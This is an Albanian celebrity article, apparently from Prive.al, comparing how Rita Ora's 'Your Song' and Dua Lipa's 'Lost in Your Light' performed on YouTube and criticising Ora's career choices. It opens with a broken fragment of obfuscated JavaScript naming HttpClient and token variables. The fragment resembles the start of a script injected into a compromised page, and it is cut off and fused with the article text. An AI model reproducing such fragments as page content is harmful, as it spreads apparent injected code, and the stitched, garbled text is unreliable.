;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

RIta Ora vs. Dua Lipa: Dallimi në sukses të këngës është i thellë

By

Ishte e para që na bëri krenarë si shqiptarë në botë kur në vitin 2012, me albumin e parë të saj krijoi hite që zunë vendin e parë në Britani të Madhe e Amerikë.

Kur të gjithë prisnin që Rita Ora të ishte pasuesja e Rihannas, ashtu siç edhe u mendua edhe nga shumë media botërore, një varg i zhvillimeve i dhanë një kthesë aspak të mirë këngëtares.

Prishja e raporteve me Roc Nation të Jay Z, lidhjet e shpeshta dhe ndarjet që reflektonin në karrierë si me rastin e Calvin Harris dhe problemet personale bënë që emri i Rita Orës për dy vite të mos përmendej për ndonjë risi në muzikë.

E duket që kjo periudhë e pauzimit t’i ketë kushtuar shumë këngëtares.

Dy ditë pas publikimit të ‘Your Song’, projekt i punuar nga Ed Sheeran i cili madje u promovua edhe në Snapchat si filter i posaçëm, Rita Ora në kanalin e saj nuk ka arritur ta grumbullojë as milionin e parë të shikimeve, ndonëse në periudhë të njejtë, këtë mund ta ketë bërë Ledri Vula me ‘U harrum’ në diskografinë shqiptare së fundmi.

Për efekt krahasimi, këngëtarja ka mbetur dukshëm prapa edhe me Dua Lipën, një tjetër yll në ngjitje nga Prishtina që me stilin unik, strategjinë e mirëmenduar dhe imazhin që reflekton, çdo ditë e më tepër po fiton terren në skenën ndërkombëtare të muzikës.

Lipa, e cila lansoi në po të njejtën ditë me Ritën këngën e re, ndonëse disa orë pas, ka dyfishin e shikimeve në Youtube me ‘Lost in Your Light’ që po pëlqehet shumë nga fansat besnikë të saj.

Performanca e ‘Your Song’ duket të jetë një sinjal paralajmërues për Rita Orën që përtej promovimit amatoresk me video në Instagram, ky është momenti i fundit që  t’i përvishet punës seriozisht meqenëse me prurjet e gjeneratave të reja, rreziku është i madh që treni t’i ikë përfundimisht. /Prive.al/

Artikuj të ngjashëm